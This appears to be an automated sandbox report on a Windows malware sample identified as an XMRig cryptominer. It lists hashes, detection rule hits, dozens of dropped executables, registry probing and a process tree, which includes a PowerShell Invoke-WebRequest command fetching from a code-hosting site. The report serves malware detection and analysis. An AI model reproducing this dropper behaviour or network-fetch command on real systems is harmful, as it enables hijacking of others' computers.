xmrig | cfec838ba62a67d8254961c15241e969465e15aff54e257d2eec71d406723694

Analysis

max time kernel
91s
max time network
93s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
03/05/2024, 05:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
Size

2.1MB
MD5

0fc7c1287eae843c4a7ef618f698dc49
SHA1

e5e94f099888af853ff3300c6317fc0b5fef29ab
SHA256

cfec838ba62a67d8254961c15241e969465e15aff54e257d2eec71d406723694
SHA512

b2b0140e4c2cb8818d62559768645eb4ea8988af6fa58e4de9e1481339925ab3657d9625943b1323e291e2adbbb6a8a50d4c31bab77eebb6ed2cc2cb6e8061fd
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1VQx7Va4qrr:NABu

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/364-79-0x00007FF6CE230000-0x00007FF6CE622000-memory.dmp	xmrig
behavioral2/memory/824-351-0x00007FF7A3D90000-0x00007FF7A4182000-memory.dmp	xmrig
behavioral2/memory/2188-356-0x00007FF6967D0000-0x00007FF696BC2000-memory.dmp	xmrig
behavioral2/memory/2404-348-0x00007FF62A400000-0x00007FF62A7F2000-memory.dmp	xmrig
behavioral2/memory/2336-346-0x00007FF7AF9A0000-0x00007FF7AFD92000-memory.dmp	xmrig
behavioral2/memory/1612-339-0x00007FF6A28B0000-0x00007FF6A2CA2000-memory.dmp	xmrig
behavioral2/memory/3688-369-0x00007FF7C81A0000-0x00007FF7C8592000-memory.dmp	xmrig
behavioral2/memory/3524-381-0x00007FF6B2E20000-0x00007FF6B3212000-memory.dmp	xmrig
behavioral2/memory/2168-410-0x00007FF7D1AD0000-0x00007FF7D1EC2000-memory.dmp	xmrig
behavioral2/memory/1540-415-0x00007FF7F0DE0000-0x00007FF7F11D2000-memory.dmp	xmrig
behavioral2/memory/2820-426-0x00007FF6DA5C0000-0x00007FF6DA9B2000-memory.dmp	xmrig
behavioral2/memory/2216-431-0x00007FF6929D0000-0x00007FF692DC2000-memory.dmp	xmrig
behavioral2/memory/2480-439-0x00007FF6E0630000-0x00007FF6E0A22000-memory.dmp	xmrig
behavioral2/memory/1084-437-0x00007FF70EE50000-0x00007FF70F242000-memory.dmp	xmrig
behavioral2/memory/820-435-0x00007FF7F1B30000-0x00007FF7F1F22000-memory.dmp	xmrig
behavioral2/memory/488-407-0x00007FF75BA60000-0x00007FF75BE52000-memory.dmp	xmrig
behavioral2/memory/4464-399-0x00007FF7AEFB0000-0x00007FF7AF3A2000-memory.dmp	xmrig
behavioral2/memory/392-395-0x00007FF756BC0000-0x00007FF756FB2000-memory.dmp	xmrig
behavioral2/memory/992-391-0x00007FF630BC0000-0x00007FF630FB2000-memory.dmp	xmrig
behavioral2/memory/4176-384-0x00007FF657D00000-0x00007FF6580F2000-memory.dmp	xmrig
behavioral2/memory/2328-377-0x00007FF683270000-0x00007FF683662000-memory.dmp	xmrig
behavioral2/memory/3356-367-0x00007FF648B60000-0x00007FF648F52000-memory.dmp	xmrig
behavioral2/memory/220-70-0x00007FF727C80000-0x00007FF728072000-memory.dmp	xmrig
behavioral2/memory/2112-66-0x00007FF718B10000-0x00007FF718F02000-memory.dmp	xmrig
behavioral2/memory/2216-2026-0x00007FF6929D0000-0x00007FF692DC2000-memory.dmp	xmrig
behavioral2/memory/2112-2028-0x00007FF718B10000-0x00007FF718F02000-memory.dmp	xmrig
behavioral2/memory/364-2030-0x00007FF6CE230000-0x00007FF6CE622000-memory.dmp	xmrig
behavioral2/memory/1612-2033-0x00007FF6A28B0000-0x00007FF6A2CA2000-memory.dmp	xmrig
behavioral2/memory/2336-2036-0x00007FF7AF9A0000-0x00007FF7AFD92000-memory.dmp	xmrig
behavioral2/memory/220-2034-0x00007FF727C80000-0x00007FF728072000-memory.dmp	xmrig
behavioral2/memory/824-2038-0x00007FF7A3D90000-0x00007FF7A4182000-memory.dmp	xmrig
behavioral2/memory/2188-2040-0x00007FF6967D0000-0x00007FF696BC2000-memory.dmp	xmrig
behavioral2/memory/820-2042-0x00007FF7F1B30000-0x00007FF7F1F22000-memory.dmp	xmrig
behavioral2/memory/1084-2044-0x00007FF70EE50000-0x00007FF70F242000-memory.dmp	xmrig
behavioral2/memory/2404-2049-0x00007FF62A400000-0x00007FF62A7F2000-memory.dmp	xmrig
behavioral2/memory/2480-2052-0x00007FF6E0630000-0x00007FF6E0A22000-memory.dmp	xmrig
behavioral2/memory/3688-2051-0x00007FF7C81A0000-0x00007FF7C8592000-memory.dmp	xmrig
behavioral2/memory/3356-2047-0x00007FF648B60000-0x00007FF648F52000-memory.dmp	xmrig
behavioral2/memory/3524-2056-0x00007FF6B2E20000-0x00007FF6B3212000-memory.dmp	xmrig
behavioral2/memory/2328-2055-0x00007FF683270000-0x00007FF683662000-memory.dmp	xmrig
behavioral2/memory/992-2060-0x00007FF630BC0000-0x00007FF630FB2000-memory.dmp	xmrig
behavioral2/memory/4176-2059-0x00007FF657D00000-0x00007FF6580F2000-memory.dmp	xmrig
behavioral2/memory/392-2062-0x00007FF756BC0000-0x00007FF756FB2000-memory.dmp	xmrig
behavioral2/memory/488-2064-0x00007FF75BA60000-0x00007FF75BE52000-memory.dmp	xmrig
behavioral2/memory/4464-2066-0x00007FF7AEFB0000-0x00007FF7AF3A2000-memory.dmp	xmrig
behavioral2/memory/1540-2070-0x00007FF7F0DE0000-0x00007FF7F11D2000-memory.dmp	xmrig
behavioral2/memory/2820-2072-0x00007FF6DA5C0000-0x00007FF6DA9B2000-memory.dmp	xmrig
behavioral2/memory/2168-2068-0x00007FF7D1AD0000-0x00007FF7D1EC2000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2688	powershell.exe
5	2688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2688	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2216	kGBTajy.exe
2112	PyLwuUX.exe
220	LBZwdcn.exe
364	goDmKZQ.exe
1612	ZsBbtaP.exe
820	xjJApYL.exe
2336	PyYwltF.exe
2404	jvspCnf.exe
824	lHbWrlh.exe
2188	lXfvMik.exe
1084	tWTjknP.exe
3356	Rmcxqum.exe
2480	FuRgVMu.exe
3688	rXgTnVs.exe
2328	HHSKiBd.exe
3524	gZfWTwG.exe
4176	boXsfpl.exe
992	rdtTPfD.exe
392	VOYDvvN.exe
4464	mSQavIs.exe
488	jhsHhoM.exe
2168	AFpIimZ.exe
1540	cDQkeJW.exe
2820	urWeOmh.exe
1268	KfrTbtY.exe
4848	gbdKgFD.exe
2464	HDhzRoy.exe
2272	wOWsEgv.exe
4800	OqZFlVJ.exe
3228	nZOYXrm.exe
2692	bhQCwDS.exe
3520	LLHKvcv.exe
2108	kvsIYtz.exe
436	cqtBOpN.exe
4844	LfBsmJW.exe
2552	BcFfsCv.exe
4748	hyBCjGV.exe
2976	nNckimI.exe
2016	nLPCFCU.exe
2548	XCTwODz.exe
4756	TJiHAvS.exe
1440	cpqYbpo.exe
4436	WmxWsin.exe
4424	xhFMzgk.exe
4456	bnWzuho.exe
3236	tmEGHvQ.exe
1236	hZOtmoZ.exe
3656	uhMyBZn.exe
4512	QLBdzZF.exe
552	nHdmfqb.exe
1644	pjsJYvS.exe
3976	oMQiZis.exe
5044	imIGhBK.exe
652	tlgBBbl.exe
2324	wTWQZfN.exe
2004	ZGzoTKN.exe
1044	jHXKAIj.exe
756	AgBSyTB.exe
4212	lZEkfWq.exe
1580	vIMTFAm.exe
1400	IQeeXjH.exe
568	hJoEXyL.exe
2876	iRnUOTk.exe
3844	zajRUwp.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4780-0-0x00007FF620460000-0x00007FF620852000-memory.dmp	upx
behavioral2/files/0x0008000000023286-6.dat	upx
behavioral2/files/0x0007000000023420-9.dat	upx
behavioral2/files/0x0007000000023424-35.dat	upx
behavioral2/files/0x0007000000023425-52.dat	upx
behavioral2/files/0x0007000000023427-56.dat	upx
behavioral2/files/0x0007000000023429-69.dat	upx
behavioral2/memory/364-79-0x00007FF6CE230000-0x00007FF6CE622000-memory.dmp	upx
behavioral2/files/0x000700000002342b-87.dat	upx
behavioral2/files/0x000700000002342a-92.dat	upx
behavioral2/files/0x000700000002342d-100.dat	upx
behavioral2/files/0x000700000002342f-107.dat	upx
behavioral2/files/0x0007000000023432-125.dat	upx
behavioral2/files/0x0007000000023434-135.dat	upx
behavioral2/files/0x0007000000023436-145.dat	upx
behavioral2/memory/824-351-0x00007FF7A3D90000-0x00007FF7A4182000-memory.dmp	upx
behavioral2/memory/2188-356-0x00007FF6967D0000-0x00007FF696BC2000-memory.dmp	upx
behavioral2/memory/2404-348-0x00007FF62A400000-0x00007FF62A7F2000-memory.dmp	upx
behavioral2/memory/2336-346-0x00007FF7AF9A0000-0x00007FF7AFD92000-memory.dmp	upx
behavioral2/memory/1612-339-0x00007FF6A28B0000-0x00007FF6A2CA2000-memory.dmp	upx
behavioral2/memory/3688-369-0x00007FF7C81A0000-0x00007FF7C8592000-memory.dmp	upx
behavioral2/memory/3524-381-0x00007FF6B2E20000-0x00007FF6B3212000-memory.dmp	upx
behavioral2/memory/2168-410-0x00007FF7D1AD0000-0x00007FF7D1EC2000-memory.dmp	upx
behavioral2/memory/1540-415-0x00007FF7F0DE0000-0x00007FF7F11D2000-memory.dmp	upx
behavioral2/memory/2820-426-0x00007FF6DA5C0000-0x00007FF6DA9B2000-memory.dmp	upx
behavioral2/memory/2216-431-0x00007FF6929D0000-0x00007FF692DC2000-memory.dmp	upx
behavioral2/memory/2480-439-0x00007FF6E0630000-0x00007FF6E0A22000-memory.dmp	upx
behavioral2/memory/1084-437-0x00007FF70EE50000-0x00007FF70F242000-memory.dmp	upx
behavioral2/memory/820-435-0x00007FF7F1B30000-0x00007FF7F1F22000-memory.dmp	upx
behavioral2/memory/488-407-0x00007FF75BA60000-0x00007FF75BE52000-memory.dmp	upx
behavioral2/memory/4464-399-0x00007FF7AEFB0000-0x00007FF7AF3A2000-memory.dmp	upx
behavioral2/memory/392-395-0x00007FF756BC0000-0x00007FF756FB2000-memory.dmp	upx
behavioral2/memory/992-391-0x00007FF630BC0000-0x00007FF630FB2000-memory.dmp	upx
behavioral2/memory/4176-384-0x00007FF657D00000-0x00007FF6580F2000-memory.dmp	upx
behavioral2/memory/2328-377-0x00007FF683270000-0x00007FF683662000-memory.dmp	upx
behavioral2/memory/3356-367-0x00007FF648B60000-0x00007FF648F52000-memory.dmp	upx
behavioral2/files/0x000700000002343e-179.dat	upx
behavioral2/files/0x000700000002343c-175.dat	upx
behavioral2/files/0x000700000002343d-174.dat	upx
behavioral2/files/0x000700000002343b-170.dat	upx
behavioral2/files/0x000700000002343a-165.dat	upx
behavioral2/files/0x0007000000023439-159.dat	upx
behavioral2/files/0x0007000000023438-155.dat	upx
behavioral2/files/0x0007000000023437-150.dat	upx
behavioral2/files/0x0007000000023435-140.dat	upx
behavioral2/files/0x0007000000023433-130.dat	upx
behavioral2/files/0x0007000000023431-119.dat	upx
behavioral2/files/0x0007000000023430-112.dat	upx
behavioral2/files/0x000700000002342e-102.dat	upx
behavioral2/files/0x000700000002342c-97.dat	upx
behavioral2/files/0x0007000000023428-71.dat	upx
behavioral2/memory/220-70-0x00007FF727C80000-0x00007FF728072000-memory.dmp	upx
behavioral2/memory/2112-66-0x00007FF718B10000-0x00007FF718F02000-memory.dmp	upx
behavioral2/files/0x0007000000023426-65.dat	upx
behavioral2/files/0x0008000000023423-64.dat	upx
behavioral2/files/0x0008000000023422-51.dat	upx
behavioral2/files/0x0007000000023421-34.dat	upx
behavioral2/files/0x000800000002341c-13.dat	upx
behavioral2/memory/2216-2026-0x00007FF6929D0000-0x00007FF692DC2000-memory.dmp	upx
behavioral2/memory/2112-2028-0x00007FF718B10000-0x00007FF718F02000-memory.dmp	upx
behavioral2/memory/364-2030-0x00007FF6CE230000-0x00007FF6CE622000-memory.dmp	upx
behavioral2/memory/1612-2033-0x00007FF6A28B0000-0x00007FF6A2CA2000-memory.dmp	upx
behavioral2/memory/2336-2036-0x00007FF7AF9A0000-0x00007FF7AFD92000-memory.dmp	upx
behavioral2/memory/220-2034-0x00007FF727C80000-0x00007FF728072000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\IFBHbdd.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\BBcrcxg.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\YfQvpkd.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\ZyMYPGd.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\lZEkfWq.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\XjIqSRd.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\JGBHneu.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\VoaCjCQ.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\DHYLfna.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\xZFuNrT.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\krWWUGj.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\rcXpUcA.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\ygZfBtS.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\CVAXsfG.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\LBZwdcn.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\PxxAivN.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\ExGSNTY.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\PyLwuUX.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\AJbfdpH.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\aRDiPHl.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\DiDdiXh.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\qttanaB.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\JMRlFbv.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\RdNqlIR.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\oMQiZis.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\nHdmfqb.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\NaxoWBq.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\zyGBeWU.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\dilcpRg.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\XZcKOIq.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\QkqizhU.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\VOYDvvN.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\YpbsXiY.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\swTKvLA.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\KhNbnlk.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\bLwMQBJ.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\LXEmqOy.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\znPDYCZ.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\qaCGoJi.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\tozlvwz.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\JxedQFo.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\SkmYCKG.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\iLPqgzu.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\FaRWsTa.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\EfbsvME.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\QDHlTlw.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\svxzPGS.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\gtaiwap.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\RSvwGzR.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\iFMWUEb.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\plJxELa.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\UMDFAKI.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\DNdBZZr.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\eTLGGaa.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\gZfWTwG.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\qoGWnMg.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\wiHAVdC.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\xIiZVBd.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\WLfbMQp.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\YVwUmIF.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\GqHUifw.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\VjvwpXo.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\IYaCSex.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
File created	C:\Windows\System\fsmsBtg.exe	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2688	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeLockMemoryPrivilege	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4780 wrote to memory of 2688	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	83
PID 4780 wrote to memory of 2688	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	83
PID 4780 wrote to memory of 2216	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	84
PID 4780 wrote to memory of 2216	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	84
PID 4780 wrote to memory of 2112	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	85
PID 4780 wrote to memory of 2112	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	85
PID 4780 wrote to memory of 220	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	86
PID 4780 wrote to memory of 220	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	86
PID 4780 wrote to memory of 1612	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	87
PID 4780 wrote to memory of 1612	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	87
PID 4780 wrote to memory of 364	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	88
PID 4780 wrote to memory of 364	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	88
PID 4780 wrote to memory of 2404	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	89
PID 4780 wrote to memory of 2404	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	89
PID 4780 wrote to memory of 820	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	90
PID 4780 wrote to memory of 820	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	90
PID 4780 wrote to memory of 2336	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	91
PID 4780 wrote to memory of 2336	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	91
PID 4780 wrote to memory of 2188	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	92
PID 4780 wrote to memory of 2188	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	92
PID 4780 wrote to memory of 824	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	93
PID 4780 wrote to memory of 824	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	93
PID 4780 wrote to memory of 1084	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	94
PID 4780 wrote to memory of 1084	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	94
PID 4780 wrote to memory of 3356	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	95
PID 4780 wrote to memory of 3356	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	95
PID 4780 wrote to memory of 3688	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	96
PID 4780 wrote to memory of 3688	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	96
PID 4780 wrote to memory of 2480	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	97
PID 4780 wrote to memory of 2480	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	97
PID 4780 wrote to memory of 2328	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	98
PID 4780 wrote to memory of 2328	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	98
PID 4780 wrote to memory of 3524	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	99
PID 4780 wrote to memory of 3524	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	99
PID 4780 wrote to memory of 4176	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	100
PID 4780 wrote to memory of 4176	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	100
PID 4780 wrote to memory of 992	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	101
PID 4780 wrote to memory of 992	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	101
PID 4780 wrote to memory of 392	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	102
PID 4780 wrote to memory of 392	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	102
PID 4780 wrote to memory of 4464	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	103
PID 4780 wrote to memory of 4464	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	103
PID 4780 wrote to memory of 488	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	104
PID 4780 wrote to memory of 488	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	104
PID 4780 wrote to memory of 2168	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	105
PID 4780 wrote to memory of 2168	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	105
PID 4780 wrote to memory of 1540	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	106
PID 4780 wrote to memory of 1540	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	106
PID 4780 wrote to memory of 2820	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	107
PID 4780 wrote to memory of 2820	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	107
PID 4780 wrote to memory of 1268	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	108
PID 4780 wrote to memory of 1268	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	108
PID 4780 wrote to memory of 4848	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	109
PID 4780 wrote to memory of 4848	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	109
PID 4780 wrote to memory of 2464	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	110
PID 4780 wrote to memory of 2464	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	110
PID 4780 wrote to memory of 2272	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	111
PID 4780 wrote to memory of 2272	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	111
PID 4780 wrote to memory of 4800	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	112
PID 4780 wrote to memory of 4800	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	112
PID 4780 wrote to memory of 3228	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	113
PID 4780 wrote to memory of 3228	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	113
PID 4780 wrote to memory of 2692	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	114
PID 4780 wrote to memory of 2692	4780	0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe	114

C:\Users\Admin\AppData\Local\Temp\3606372934\zmstage.exe
C:\Users\Admin\AppData\Local\Temp\3606372934\zmstage.exe
1⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0fc7c1287eae843c4a7ef618f698dc49_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- - C:\Windows\system32\wermgr.exe
